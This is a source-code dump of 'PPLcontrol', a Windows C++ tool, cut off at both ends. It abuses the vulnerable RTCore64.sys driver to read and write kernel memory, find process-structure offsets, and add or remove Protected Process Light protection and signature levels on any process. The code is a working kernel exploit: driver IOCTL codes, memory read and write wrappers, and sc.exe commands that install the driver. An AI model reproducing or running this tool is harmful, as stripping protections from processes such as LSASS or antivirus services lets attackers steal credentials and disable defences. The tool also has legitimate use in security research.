479 | return TRUE; 480 | } 481 | 482 | BOOL Controller::SetProcessSignatureLevel(ULONG_PTR Addr, UCHAR SignatureLevel) 483 | { 484 | return _rtc->Write8(Addr + _of->GetOffset(Offset::ProcessSignatureLevel), SignatureLevel); 485 | } 486 | 487 | BOOL Controller::GetProcessSectionSignatureLevel(ULONG_PTR Addr, PUCHAR SectionSignatureLevel) 488 | { 489 | UCHAR bSectionSignatureLevel; 490 | 491 | if (!(_rtc->Read8(Addr + _of->GetOffset(Offset::ProcessSectionSignatureLevel), &bSectionSignatureLevel))) 492 | { 493 | #ifdef _WIN64 494 | ERROR(L"Failed to retrieve SectionSignatureLevel attribute of process @ 0x%016llx.", Addr); 495 | #else 496 | ERROR(L"Failed to retrieve SectionSignatureLevel attribute of process @ 0x%08x.", Addr); 497 | #endif 498 | return FALSE; 499 | } 500 | 501 | *SectionSignatureLevel = bSectionSignatureLevel; 502 | 503 | return TRUE; 504 | } 505 | 506 | BOOL Controller::SetProcessSectionSignatureLevel(ULONG_PTR Addr, UCHAR SectionSignatureLevel) 507 | { 508 | return _rtc->Write8(Addr + _of->GetOffset(Offset::ProcessSectionSignatureLevel), SectionSignatureLevel); 509 | } -------------------------------------------------------------------------------- /PPLcontrol/Controller.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "RTCore.h" 4 | #include "OffsetFinder.h" 5 | #include "Utils.h" 6 | 7 | typedef struct _CTRL_PROCESS_ENTRY 8 | { 9 | ULONG_PTR KernelAddress; 10 | DWORD Pid; 11 | UCHAR ProtectionLevel; 12 | UCHAR SignerType; 13 | UCHAR SignatureLevel; 14 | UCHAR SectionSignatureLevel; 15 | } CTRL_PROCESS_ENTRY, *PCTRL_PROCESS_ENTRY; 16 | 17 | typedef struct _CTRL_PROCESS_INFO 18 | { 19 | DWORD NumberOfEntries; 20 | CTRL_PROCESS_ENTRY Entries[ANYSIZE_ARRAY]; 21 | } CTRL_PROCESS_INFO, *PCTRL_PROCESS_INFO; 22 | 23 | class Controller 24 | { 25 | public: 26 | Controller(); 27 | Controller(RTCore* rtc, OffsetFinder* of); 28 | BOOL ListProtectedProcesses(); 29 | BOOL GetProcessProtection(DWORD Pid); 30 | BOOL SetProcessProtection(DWORD Pid, LPCWSTR ProtectionLevel, LPCWSTR SignerType); 31 | BOOL GetProcessSignatureLevels(DWORD Pid); 32 | BOOL SetProcessSignatureLevels(DWORD Pid, LPCWSTR SignerType); 33 | BOOL ProtectProcess(DWORD Pid, LPCWSTR ProtectionLevel, LPCWSTR SignerType); 34 | BOOL UnprotectProcess(DWORD Pid); 35 | 36 | private: 37 | RTCore* _rtc; 38 | OffsetFinder* _of; 39 | 40 | private: 41 | BOOL GetInitialSystemProcessAddress(PULONG_PTR Addr); 42 | BOOL GetProcessKernelAddress(DWORD Pid, PULONG_PTR Addr); 43 | BOOL GetProcessList(PCTRL_PROCESS_INFO *List); 44 | BOOL GetProcessProtection(ULONG_PTR Addr, PUCHAR Protection); 45 | BOOL SetProcessProtection(ULONG_PTR Addr, UCHAR Protection); 46 | BOOL GetProcessSignatureLevel(ULONG_PTR Addr, PUCHAR SignatureLevel); 47 | BOOL SetProcessSignatureLevel(ULONG_PTR Addr, UCHAR SignatureLevel); 48 | BOOL GetProcessSectionSignatureLevel(ULONG_PTR Addr, PUCHAR SectionSignatureLevel); 49 | BOOL SetProcessSectionSignatureLevel(ULONG_PTR Addr, UCHAR SectionSignatureLevel); 50 | }; -------------------------------------------------------------------------------- /PPLcontrol/OffsetFinder.cpp: -------------------------------------------------------------------------------- 1 | #include "OffsetFinder.h" 2 | #include "RTCore.h" 3 | #include "Utils.h" 4 | 5 | OffsetFinder::OffsetFinder() 6 | { 7 | _KernelModule = LoadLibraryW(OF_STR_KERNEL_IMAGE_FILE_NAME_W); 8 | } 9 | 10 | OffsetFinder::~OffsetFinder() 11 | { 12 | if (_KernelModule) 13 | FreeLibrary(_KernelModule); 14 | } 15 | 16 | DWORD OffsetFinder::GetOffset(Offset Name) 17 | { 18 | return _OffsetMap[Name]; 19 | } 20 | 21 | BOOL OffsetFinder::FindAllOffsets() 22 | { 23 | if (!FindKernelPsInitialSystemProcessOffset()) 24 | return FALSE; 25 | 26 | if (!FindProcessUniqueProcessIdOffset()) 27 | return FALSE; 28 | 29 | if (!FindProcessProtectionOffset()) 30 | return FALSE; 31 | 32 | if (!FindProcessActiveProcessLinksOffset()) 33 | return FALSE; 34 | 35 | if (!FindProcessSignatureLevelOffset()) 36 | return FALSE; 37 | 38 | if (!FindProcessSectionSignatureLevelOffset()) 39 | return FALSE; 40 | 41 | return TRUE; 42 | } 43 | 44 | BOOL OffsetFinder::FindKernelPsInitialSystemProcessOffset() 45 | { 46 | ULONG_PTR pPsInitialSystemProcess; 47 | DWORD dwPsInitialSystemProcessOffset; 48 | 49 | if (_OffsetMap.find(Offset::KernelPsInitialSystemProcess) != _OffsetMap.end()) 50 | return TRUE; 51 | 52 | if (!(pPsInitialSystemProcess = (ULONG_PTR)GetProcAddress(_KernelModule, OF_STR_PSINITIALSYSTEMPROCESS_SYMBOL_NAME_A))) 53 | { 54 | ERROR(L"The procedure '%ws' was not found.", OF_STR_PSINITIALSYSTEMPROCESS_SYMBOL_NAME_W); 55 | return FALSE; 56 | } 57 | 58 | DEBUG(L"%ws @ 0x%016llx", OF_STR_PSINITIALSYSTEMPROCESS_SYMBOL_NAME_W, (DWORD64)pPsInitialSystemProcess); 59 | 60 | dwPsInitialSystemProcessOffset = (DWORD)(pPsInitialSystemProcess - (ULONG_PTR)_KernelModule); 61 | 62 | DEBUG(L"Offset: 0x%08x", dwPsInitialSystemProcessOffset); 63 | 64 | _OffsetMap.insert(std::make_pair(Offset::KernelPsInitialSystemProcess, dwPsInitialSystemProcessOffset)); 65 | 66 | return TRUE; 67 | } 68 | 69 | BOOL OffsetFinder::FindProcessActiveProcessLinksOffset() 70 | { 71 | WORD wActiveProcessLinks; 72 | 73 | if (_OffsetMap.find(Offset::ProcessActiveProcessLinks) != _OffsetMap.end()) 74 | return TRUE; 75 | 76 | if (_OffsetMap.find(Offset::ProcessUniqueProcessId) == _OffsetMap.end()) 77 | { 78 | ERROR(L"The offset 'UniqueProcessId' is not defined."); 79 | return FALSE; 80 | } 81 | 82 | wActiveProcessLinks = (WORD)_OffsetMap[Offset::ProcessUniqueProcessId] + sizeof(HANDLE); 83 | 84 | DEBUG(L"Offset: 0x%04x", wActiveProcessLinks); 85 | 86 | _OffsetMap.insert(std::make_pair(Offset::ProcessActiveProcessLinks, wActiveProcessLinks)); 87 | 88 | return TRUE; 89 | } 90 | 91 | BOOL OffsetFinder::FindProcessUniqueProcessIdOffset() 92 | { 93 | FARPROC pPsGetProcessId; 94 | WORD wUniqueProcessIdOffset; 95 | 96 | if (_OffsetMap.find(Offset::ProcessUniqueProcessId) != _OffsetMap.end()) 97 | return TRUE; 98 | 99 | if (!(pPsGetProcessId = GetProcAddress(_KernelModule, OF_STR_PSGETPROCESSID_PROC_NAME_A))) 100 | { 101 | ERROR(L"The procedure '%ws' was not found", OF_STR_PSGETPROCESSID_PROC_NAME_W); 102 | return FALSE; 103 | } 104 | 105 | DEBUG(L"%ws @ 0x%016llx", OF_STR_PSGETPROCESSID_PROC_NAME_W, (DWORD64)pPsGetProcessId); 106 | 107 | #ifdef _WIN64 108 | memcpy_s(&wUniqueProcessIdOffset, sizeof(wUniqueProcessIdOffset), (PVOID)((ULONG_PTR)pPsGetProcessId + 3), sizeof(wUniqueProcessIdOffset)); 109 | #else 110 | memcpy_s(&wUniqueProcessIdOffset, sizeof(wUniqueProcessIdOffset), (PVOID)((ULONG_PTR)pPsGetProcessId + 2), sizeof(wUniqueProcessIdOffset)); 111 | #endif 112 | 113 | DEBUG(L"Offset: 0x%04x", wUniqueProcessIdOffset); 114 | 115 | if (wUniqueProcessIdOffset > 0x0fff) 116 | { 117 | ERROR(L"The offset value of 'UniqueProcessId' is greater than the maximum allowed (0x%04x).", wUniqueProcessIdOffset); 118 | return FALSE; 119 | } 120 | 121 | _OffsetMap.insert(std::make_pair(Offset::ProcessUniqueProcessId, wUniqueProcessIdOffset)); 122 | 123 | return TRUE; 124 | } 125 | 126 | BOOL OffsetFinder::FindProcessProtectionOffset() 127 | { 128 | FARPROC pPsIsProtectedProcess, pPsIsProtectedProcessLight; 129 | WORD wProtectionOffsetA, wProtectionOffsetB; 130 | 131 | if (_OffsetMap.find(Offset::ProcessProtection) != _OffsetMap.end()) 132 | return TRUE; 133 | 134 | if (!(pPsIsProtectedProcess = GetProcAddress(_KernelModule, OF_STR_PSISPROTECTEDPROCESS_PROC_NAME_A))) 135 | { 136 | ERROR(L"The procedure '%ws' was not found", OF_STR_PSISPROTECTEDPROCESS_PROC_NAME_W); 137 | return FALSE; 138 | } 139 | 140 | DEBUG(L"%ws @ 0x%016llx", OF_STR_PSISPROTECTEDPROCESS_PROC_NAME_W, (DWORD64)pPsIsProtectedProcess); 141 | 142 | if (!(pPsIsProtectedProcessLight = GetProcAddress(_KernelModule, OF_STR_PSISPROTECTEDPROCESSLIGHT_PROC_NAME_A))) 143 | { 144 | ERROR(L"The procedure '%ws' was not found", OF_STR_PSISPROTECTEDPROCESSLIGHT_PROC_NAME_W); 145 | return FALSE; 146 | } 147 | 148 | DEBUG(L"%ws @ 0x%016llx", OF_STR_PSISPROTECTEDPROCESSLIGHT_PROC_NAME_W, (DWORD64)pPsIsProtectedProcessLight); 149 | 150 | memcpy_s(&wProtectionOffsetA, sizeof(wProtectionOffsetA), (PVOID)((ULONG_PTR)pPsIsProtectedProcess + 2), sizeof(wProtectionOffsetA)); 151 | memcpy_s(&wProtectionOffsetB, sizeof(wProtectionOffsetB), (PVOID)((ULONG_PTR)pPsIsProtectedProcessLight + 2), sizeof(wProtectionOffsetB)); 152 | 153 | DEBUG(L"Offset in %ws: 0x%04x | Offset in %ws: 0x%04x", OF_STR_PSISPROTECTEDPROCESS_PROC_NAME_W, wProtectionOffsetA, OF_STR_PSISPROTECTEDPROCESSLIGHT_PROC_NAME_W, wProtectionOffsetB); 154 | 155 | if (wProtectionOffsetA != wProtectionOffsetB || wProtectionOffsetA > 0x0fff) 156 | { 157 | ERROR(L"The offset value of 'Protection' is inconsistent or is greater than the maximum allowed (0x%04x / 0x%04x)", wProtectionOffsetA, wProtectionOffsetB); 158 | return FALSE; 159 | } 160 | 161 | _OffsetMap.insert(std::make_pair(Offset::ProcessProtection, wProtectionOffsetA)); 162 | 163 | return TRUE; 164 | } 165 | 166 | BOOL OffsetFinder::FindProcessSignatureLevelOffset() 167 | { 168 | WORD wSignatureLevel; 169 | 170 | if (_OffsetMap.find(Offset::ProcessSignatureLevel) != _OffsetMap.end()) 171 | return TRUE; 172 | 173 | if (_OffsetMap.find(Offset::ProcessProtection) == _OffsetMap.end()) 174 | { 175 | ERROR(L"The offset 'Protection' is not defined."); 176 | return FALSE; 177 | } 178 | 179 | wSignatureLevel = (WORD)_OffsetMap[Offset::ProcessProtection] - (2 * sizeof(UCHAR)); 180 | 181 | DEBUG(L"Offset: 0x%04x", wSignatureLevel); 182 | 183 | _OffsetMap.insert(std::make_pair(Offset::ProcessSignatureLevel, wSignatureLevel)); 184 | 185 | return TRUE; 186 | } 187 | 188 | BOOL OffsetFinder::FindProcessSectionSignatureLevelOffset() 189 | { 190 | WORD wSectionSignatureLevel; 191 | 192 | if (_OffsetMap.find(Offset::ProcessSectionSignatureLevel) != _OffsetMap.end()) 193 | return TRUE; 194 | 195 | if (_OffsetMap.find(Offset::ProcessProtection) == _OffsetMap.end()) 196 | { 197 | ERROR(L"The offset 'Protection' is not defined."); 198 | return FALSE; 199 | } 200 | 201 | wSectionSignatureLevel = (WORD)_OffsetMap[Offset::ProcessProtection] - sizeof(UCHAR); 202 | 203 | DEBUG(L"Offset: 0x%04x", wSectionSignatureLevel); 204 | 205 | _OffsetMap.insert(std::make_pair(Offset::ProcessSectionSignatureLevel, wSectionSignatureLevel)); 206 | 207 | return TRUE; 208 | } -------------------------------------------------------------------------------- /PPLcontrol/OffsetFinder.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "common.h" 4 | #include 5 | 6 | #define OF_STR_KERNEL_IMAGE_FILE_NAME_W L"ntoskrnl.exe" 7 | #define OF_STR_PSINITIALSYSTEMPROCESS_SYMBOL_NAME_A "PsInitialSystemProcess" 8 | #define OF_STR_PSINITIALSYSTEMPROCESS_SYMBOL_NAME_W WIDE(OF_STR_PSINITIALSYSTEMPROCESS_SYMBOL_NAME_A) 9 | #define OF_STR_PSGETPROCESSID_PROC_NAME_A "PsGetProcessId" 10 | #define OF_STR_PSGETPROCESSID_PROC_NAME_W WIDE(OF_STR_PSGETPROCESSID_PROC_NAME_A) 11 | #define OF_STR_PSISPROTECTEDPROCESS_PROC_NAME_A "PsIsProtectedProcess" 12 | #define OF_STR_PSISPROTECTEDPROCESS_PROC_NAME_W WIDE(OF_STR_PSISPROTECTEDPROCESS_PROC_NAME_A) 13 | #define OF_STR_PSISPROTECTEDPROCESSLIGHT_PROC_NAME_A "PsIsProtectedProcessLight" 14 | #define OF_STR_PSISPROTECTEDPROCESSLIGHT_PROC_NAME_W WIDE(OF_STR_PSISPROTECTEDPROCESSLIGHT_PROC_NAME_A) 15 | 16 | enum class Offset 17 | { 18 | KernelPsInitialSystemProcess, 19 | ProcessActiveProcessLinks, 20 | ProcessUniqueProcessId, 21 | ProcessProtection, 22 | ProcessSignatureLevel, 23 | ProcessSectionSignatureLevel 24 | }; 25 | 26 | class OffsetFinder 27 | { 28 | public: 29 | OffsetFinder(); 30 | ~OffsetFinder(); 31 | DWORD GetOffset(Offset Name); 32 | BOOL FindAllOffsets(); 33 | 34 | private: 35 | HMODULE _KernelModule; 36 | std::map _OffsetMap; 37 | 38 | private: 39 | BOOL FindKernelPsInitialSystemProcessOffset(); 40 | BOOL FindProcessActiveProcessLinksOffset(); 41 | BOOL FindProcessUniqueProcessIdOffset(); 42 | BOOL FindProcessProtectionOffset(); 43 | BOOL FindProcessSignatureLevelOffset(); 44 | BOOL FindProcessSectionSignatureLevelOffset(); 45 | }; -------------------------------------------------------------------------------- /PPLcontrol/PPLcontrol.cpp: -------------------------------------------------------------------------------- 1 | #include "common.h" 2 | #include "OffsetFinder.h" 3 | #include "RTCore.h" 4 | #include "Utils.h" 5 | #include "Controller.h" 6 | 7 | #define PPLCONTROL_STR_CMD_LIST L"list" 8 | #define PPLCONTROL_STR_CMD_GET L"get" 9 | #define PPLCONTROL_STR_CMD_SET L"set" 10 | #define PPLCONTROL_STR_CMD_PROTECT L"protect" 11 | #define PPLCONTROL_STR_CMD_UNPROTECT L"unprotect" 12 | 13 | VOID PrintUsage(LPWSTR Prog); 14 | VOID PrintKernelDriverUsage(); 15 | 16 | int wmain(int argc, wchar_t* argv[]) 17 | { 18 | OffsetFinder* of; 19 | RTCore* rtc; 20 | Controller* ctrl; 21 | DWORD dwPid; 22 | 23 | if (argc < 2) 24 | { 25 | PrintUsage(argv[0]); 26 | PrintKernelDriverUsage(); 27 | return 1; 28 | } 29 | 30 | of = new OffsetFinder(); 31 | rtc = new RTCore(); 32 | ctrl = new Controller(rtc, of); 33 | 34 | if (!of->FindAllOffsets()) 35 | { 36 | ERROR(L"Failed to determine the required offsets."); 37 | return 2; 38 | } 39 | 40 | if (!_wcsicmp(argv[1], PPLCONTROL_STR_CMD_LIST)) 41 | { 42 | if (!ctrl->ListProtectedProcesses()) 43 | return 2; 44 | } 45 | else if (!_wcsicmp(argv[1], PPLCONTROL_STR_CMD_GET) || !_wcsicmp(argv[1], PPLCONTROL_STR_CMD_UNPROTECT)) 46 | { 47 | ++argv; 48 | --argc; 49 | 50 | if (argc < 2) 51 | { 52 | ERROR(L"Missing argument(s) for command: %ws", argv[0]); 53 | return 1; 54 | } 55 | 56 | if (!(dwPid = wcstoul(argv[1], nullptr, 10))) 57 | { 58 | ERROR(L"Failed to parse argument as an unsigned integer: %ws", argv[1]); 59 | return 1; 60 | } 61 | 62 | if (!_wcsicmp(argv[0], PPLCONTROL_STR_CMD_GET)) 63 | { 64 | if (!ctrl->GetProcessProtection(dwPid)) 65 | return 2; 66 | } 67 | else if (!_wcsicmp(argv[0], PPLCONTROL_STR_CMD_UNPROTECT)) 68 | { 69 | if (!ctrl->UnprotectProcess(dwPid)) 70 | return 2; 71 | } 72 | else 73 | { 74 | ERROR(L"Unknown command: %ws", argv[0]); 75 | return 1; 76 | } 77 | } 78 | else if (!_wcsicmp(argv[1], PPLCONTROL_STR_CMD_SET) || !_wcsicmp(argv[1], PPLCONTROL_STR_CMD_PROTECT)) 79 | { 80 | ++argv; 81 | --argc; 82 | 83 | if (argc < 4) 84 | { 85 | ERROR(L"Missing argument(s) for command: %ws", argv[0]); 86 | return 1; 87 | } 88 | 89 | if (!(dwPid = wcstoul(argv[1], nullptr, 10))) 90 | { 91 | ERROR(L"Failed to parse argument as an unsigned integer: %ws", argv[1]); 92 | return 1; 93 | } 94 | 95 | if (!_wcsicmp(argv[0], PPLCONTROL_STR_CMD_SET)) 96 | { 97 | if (!ctrl->SetProcessProtection(dwPid, argv[2], argv[3])) 98 | return 2; 99 | } 100 | else if (!_wcsicmp(argv[0], PPLCONTROL_STR_CMD_PROTECT)) 101 | { 102 | if (!ctrl->ProtectProcess(dwPid, argv[2], argv[3])) 103 | return 2; 104 | } 105 | else 106 | { 107 | ERROR(L"Unknown command: %ws", argv[0]); 108 | return 1; 109 | } 110 | } 111 | else 112 | { 113 | ERROR(L"Unknown command: %ws", argv[1]); 114 | return 1; 115 | } 116 | 117 | DEBUG(L"Done"); 118 | 119 | return 0; 120 | } 121 | 122 | VOID PrintUsage(LPWSTR Prog) 123 | { 124 | wprintf( 125 | L"Usage:\n" 126 | " %ws \n" 127 | "\n" 128 | "Commands:\n" 129 | " %ws\n" 130 | " %ws \n" 131 | " %ws \n" 132 | " %ws \n" 133 | " %ws \n" 134 | "\n" 135 | "Signer Types:\n" 136 | " Authenticode, CodeGen, Antimalware, Lsa, Windows, WinTcb, WinSystem\n" 137 | "\n", 138 | Prog, 139 | PPLCONTROL_STR_CMD_LIST, 140 | PPLCONTROL_STR_CMD_GET, 141 | PPLCONTROL_STR_CMD_SET, 142 | PPLCONTROL_STR_CMD_PROTECT, 143 | PPLCONTROL_STR_CMD_UNPROTECT 144 | ); 145 | } 146 | 147 | VOID PrintKernelDriverUsage() 148 | { 149 | wprintf( 150 | L"Install the driver:\n" 151 | " sc.exe create RTCore64 type= kernel start= auto binPath= C:\\PATH\\TO\\RTCore64.sys DisplayName= \"Micro - Star MSI Afterburner\"\n" 152 | " net start RTCore64\n" 153 | "\n" 154 | "Uninstall the driver:\n" 155 | " net stop RTCore64\n" 156 | " sc.exe delete RTCore64\n" 157 | "\n" 158 | ); 159 | } -------------------------------------------------------------------------------- /PPLcontrol/PPLcontrol.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {4f3de11e-c54a-4dc1-ae8f-c29a720694cc} 25 | PPLcontrol 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | -------------------------------------------------------------------------------- /PPLcontrol/PPLcontrol.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | Header Files 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | -------------------------------------------------------------------------------- /PPLcontrol/RTCore.cpp: -------------------------------------------------------------------------------- 1 | #include "RTCore.h" 2 | 3 | RTCore::RTCore() 4 | { 5 | _DeviceName = NULL; 6 | _DeviceHandle = NULL; 7 | } 8 | 9 | RTCore::~RTCore() 10 | { 11 | if (_DeviceName) 12 | HeapFree(GetProcessHeap(), 0, _DeviceName); 13 | if (_DeviceHandle) 14 | CloseHandle(_DeviceHandle); 15 | } 16 | 17 | BOOL RTCore::Read8(ULONG_PTR Address, PBYTE Value) 18 | { 19 | DWORD dwValue; 20 | 21 | if (!this->Read32(Address, &dwValue)) 22 | return FALSE; 23 | 24 | *Value = dwValue & 0xff; 25 | 26 | return TRUE; 27 | } 28 | 29 | BOOL RTCore::Read16(ULONG_PTR Address, PWORD Value) 30 | { 31 | DWORD dwValue; 32 | 33 | if (!this->Read32(Address, &dwValue)) 34 | return FALSE; 35 | 36 | *Value = dwValue & 0xffff; 37 | 38 | return TRUE; 39 | } 40 | 41 | BOOL RTCore::Read32(ULONG_PTR Address, PDWORD Value) 42 | { 43 | return this->Read(Address, sizeof(*Value), Value); 44 | } 45 | 46 | BOOL RTCore::Read64(ULONG_PTR Address, PDWORD64 Value) 47 | { 48 | DWORD dwLow, dwHigh; 49 | 50 | if (!this->Read32(Address, &dwLow) || !this->Read32(Address + 4, &dwHigh)) 51 | return FALSE; 52 | 53 | *Value = dwHigh; 54 | *Value = (*Value << 32) | dwLow; 55 | 56 | return TRUE; 57 | } 58 | 59 | BOOL RTCore::ReadPtr(ULONG_PTR Address, PULONG_PTR Value) 60 | { 61 | #ifdef _WIN64 62 | return this->Read64(Address, Value); 63 | #else 64 | return this->Read32(Address, Value); 65 | #endif 66 | } 67 | 68 | BOOL RTCore::Write8(ULONG_PTR Address, BYTE Value) 69 | { 70 | return this->Write(Address, sizeof(Value), Value); 71 | } 72 | 73 | BOOL RTCore::Write16(ULONG_PTR Address, WORD Value) 74 | { 75 | return this->Write(Address, sizeof(Value), Value); 76 | } 77 | 78 | BOOL RTCore::Write32(ULONG_PTR Address, DWORD Value) 79 | { 80 | return this->Write(Address, sizeof(Value), Value); 81 | } 82 | 83 | BOOL RTCore::Write64(ULONG_PTR Address, DWORD64 Value) 84 | { 85 | DWORD dwLow, dwHigh; 86 | 87 | dwLow = Value & 0xffffffff; 88 | dwHigh = (Value >> 32) & 0xffffffff; 89 | 90 | return this->Write32(Address, dwLow) && this->Write32(Address + 4, dwHigh); 91 | } 92 | 93 | BOOL RTCore::Initialize() 94 | { 95 | if (_DeviceHandle == NULL) 96 | { 97 | if ((_DeviceName = (LPWSTR)HeapAlloc(GetProcessHeap(), 0, (MAX_PATH + 1) * sizeof(WCHAR))) == NULL) 98 | return FALSE; 99 | 100 | swprintf_s(_DeviceName, MAX_PATH, L"\\\\.\\%ws", RTC_DEVICE_NAME_W); 101 | 102 | DEBUG(L"Device path: %ws", _DeviceName); 103 | 104 | if ((_DeviceHandle = CreateFileW(_DeviceName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL)) == INVALID_HANDLE_VALUE) 105 | { 106 | LASTERROR("CreateFileW"); 107 | return FALSE; 108 | } 109 | 110 | DEBUG(L"Device handle: 0x%04x", HandleToULong(_DeviceHandle)); 111 | } 112 | 113 | return TRUE; 114 | } 115 | 116 | BOOL RTCore::Read(ULONG_PTR Address, DWORD ValueSize, PDWORD Value) 117 | { 118 | RTC_MEMORY_READ mr; 119 | 120 | ZeroMemory(&mr, sizeof(mr)); 121 | mr.Address = Address; 122 | mr.Size = ValueSize; 123 | 124 | if (!this->Initialize()) 125 | return FALSE; 126 | 127 | if (!DeviceIoControl(_DeviceHandle, RTC_IOCTL_MEMORY_READ, &mr, sizeof(mr), &mr, sizeof(mr), NULL, NULL)) 128 | { 129 | LASTERROR("DeviceIoControl"); 130 | return FALSE; 131 | } 132 | 133 | *Value = mr.Value; 134 | 135 | DEBUG(L"0x%016llx: 0x%08x", Address, *Value); 136 | 137 | return TRUE; 138 | } 139 | 140 | BOOL RTCore::Write(ULONG_PTR Address, DWORD ValueSize, DWORD Value) 141 | { 142 | RTC_MEMORY_WRITE mw; 143 | 144 | ZeroMemory(&mw, sizeof(mw)); 145 | mw.Address = Address; 146 | mw.Size = ValueSize; 147 | mw.Value = Value; 148 | 149 | if (!this->Initialize()) 150 | return FALSE; 151 | 152 | if (!DeviceIoControl(_DeviceHandle, RTC_IOCTL_MEMORY_WRITE, &mw, sizeof(mw), &mw, sizeof(mw), NULL, NULL)) 153 | { 154 | LASTERROR("DeviceIoControl"); 155 | return FALSE; 156 | } 157 | 158 | return TRUE; 159 | } -------------------------------------------------------------------------------- /PPLcontrol/RTCore.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "common.h" 4 | 5 | #define RTC64_DEVICE_NAME_W L"RTCore64" 6 | #define RTC32_DEVICE_NAME_W L"RTCore32" 7 | 8 | // https://github.com/RedCursorSecurityConsulting/PPLKiller/blob/master/main.cpp 9 | #define RTC64_IOCTL_MEMORY_READ 0x80002048 10 | #define RTC64_IOCTL_MEMORY_WRITE 0x8000204c 11 | 12 | // https://github.com/RedCursorSecurityConsulting/PPLKiller/blob/master/main.cpp 13 | struct RTC64_MSR_READ { 14 | DWORD Register; 15 | DWORD ValueHigh; 16 | DWORD ValueLow; 17 | }; 18 | 19 | // https://github.com/RedCursorSecurityConsulting/PPLKiller/blob/master/main.cpp 20 | struct RTC64_MEMORY_READ { 21 | BYTE Pad0[8]; 22 | DWORD64 Address; 23 | BYTE Pad1[8]; 24 | DWORD Size; 25 | DWORD Value; 26 | BYTE Pad3[16]; 27 | }; 28 | 29 | // https://github.com/RedCursorSecurityConsulting/PPLKiller/blob/master/main.cpp 30 | struct RTC64_MEMORY_WRITE { 31 | BYTE Pad0[8]; 32 | DWORD64 Address; 33 | BYTE Pad1[8]; 34 | DWORD Size; 35 | DWORD Value; 36 | BYTE Pad3[16]; 37 | }; 38 | 39 | #ifdef _WIN64 40 | #define RTC_DEVICE_NAME_W RTC64_DEVICE_NAME_W 41 | #else 42 | #define RTC_DEVICE_NAME_W RTC32_DEVICE_NAME_W 43 | #endif 44 | 45 | #ifdef _WIN64 46 | #define RTC_MSR_READ RTC64_MSR_READ 47 | #define RTC_MEMORY_READ RTC64_MEMORY_READ 48 | #define RTC_MEMORY_WRITE RTC64_MEMORY_WRITE 49 | #else 50 | #error RTCore driver 32-bit structures not defined 51 | #endif 52 | 53 | #ifdef _WIN64 54 | #define RTC_IOCTL_MEMORY_READ RTC64_IOCTL_MEMORY_READ 55 | #define RTC_IOCTL_MEMORY_WRITE RTC64_IOCTL_MEMORY_WRITE 56 | #else 57 | #error RTCore driver IOCTLs not defined 58 | #endif 59 | 60 | class RTCore 61 | { 62 | public: 63 | RTCore(); 64 | ~RTCore(); 65 | BOOL Read8(ULONG_PTR Address, PBYTE Value); 66 | BOOL Read16(ULONG_PTR Address, PWORD Value); 67 | BOOL Read32(ULONG_PTR Address, PDWORD Value); 68 | BOOL Read64(ULONG_PTR Address, PDWORD64 Value); 69 | BOOL ReadPtr(ULONG_PTR Address, PULONG_PTR Value); 70 | BOOL Write8(ULONG_PTR Address, BYTE Value); 71 | BOOL Write16(ULONG_PTR Address, WORD Value); 72 | BOOL Write32(ULONG_PTR Address, DWORD Value); 73 | BOOL Write64(ULONG_PTR Address, DWORD64 Value); 74 | 75 | private: 76 | LPWSTR _DeviceName; 77 | HANDLE _DeviceHandle; 78 | 79 | private: 80 | BOOL Initialize(); 81 | BOOL Read(ULONG_PTR Address, DWORD ValueSize, PDWORD Value); 82 | BOOL Write(ULONG_PTR Address, DWORD ValueSize, DWORD Value); 83 | }; -------------------------------------------------------------------------------- /PPLcontrol/Utils.cpp: -------------------------------------------------------------------------------- 1 | #include "Utils.h" 2 | #include 3 | 4 | ULONG_PTR Utils::GetKernelBaseAddress() 